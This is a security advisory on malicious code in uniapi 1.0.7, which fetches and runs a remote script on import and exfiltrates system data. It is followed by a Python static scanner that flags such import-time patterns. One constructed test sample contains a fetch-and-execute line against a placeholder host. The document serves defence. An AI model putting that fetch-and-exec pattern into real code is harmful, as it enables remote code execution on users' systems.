PT-2025-5672 · Uniapi · Uniapi

Published: 2025-01-24 · Updated: 2025-01-24


No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
Name of the Vulnerable Software and Affected Versions: uniapi version 1.0.7
Description: The issue concerns code introduced in a specific version of the software that executes upon import of the module. This code downloads a script from a remote URL and then executes the downloaded script in a thread. The script harvests system information and sends it to another remote URL using the POST method. This malicious code was found in the release artifacts but was not present in the public repository.
Recommendations: For uniapi version 1.0.7, consider removing or avoiding the use of this version due to the presence of malicious code. As a temporary workaround, consider disabling the execution of scripts downloaded from remote URLs until a safe version is available. Avoid using the affected module until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.
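The check below is an added example, not code from the advisory or from uniapi. It parses a module's source from an unpacked release artifact without importing it, and flags the pattern described above: code reachable at import time that both fetches remote content and executes code or starts a thread. The call lists and the two sample sources are assumptions constructed for illustration.

```python
import ast

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else ""

def classify(name):
    """Assumed call lists for this example; extend them for real triage."""
    last = name.rsplit(".", 1)[-1]
    if last in {"urlopen", "urlretrieve"} or name.split(".")[0] in {"requests", "httpx"}:
        return "fetch"
    return "run" if last in {"exec", "eval", "Thread"} else None

def import_time_nodes(stmts, funcs):
    """Yield nodes that run at import: module-level code plus the bodies of
    module-level functions it references (called or passed as a thread target)."""
    stack, seen = list(stmts), set()
    while stack:
        node = stack.pop()
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            continue  # a definition does not execute its body
        yield node
        if isinstance(node, ast.Name) and node.id in funcs and node.id not in seen:
            seen.add(node.id)
            stack.extend(funcs[node.id].body)
        stack.extend(ast.iter_child_nodes(node))

def scan_source(source):
    """Map 'fetch'/'run' to sorted (line, call) pairs reachable at import time."""
    tree = ast.parse(source)
    funcs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    hits = {"fetch": [], "run": []}
    for node in import_time_nodes(tree.body, funcs):
        kind = classify(dotted(node.func)) if isinstance(node, ast.Call) else None
        if kind:
            hits[kind].append((node.lineno, dotted(node.func)))
    return {k: sorted(v) for k, v in hits.items()}

def is_suspicious(source):
    """True when import-time code both fetches remote content and runs code."""
    return all(scan_source(source).values())

# Constructed samples (not the uniapi artifact); example.invalid is a placeholder.
SAMPLE_FLAGGED = ("import threading, urllib.request\ndef _task():\n"
                  "    exec(urllib.request.urlopen('https://example.invalid/x').read())\n"
                  "threading.Thread(target=_task).start()\n")
SAMPLE_CLEAN = "import urllib.request\ndef fetch(u):\n    return urllib.request.urlopen(u).read()\n"
```

This is a static heuristic: it over-approximates (an `if __name__ == "__main__":` block counts as import-time code) and does not resolve aliased imports, so treat a hit as a reason to read the file, not as a verdict.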

Related Identifiers

PYSEC-2025-2

Affected Products

Uniapi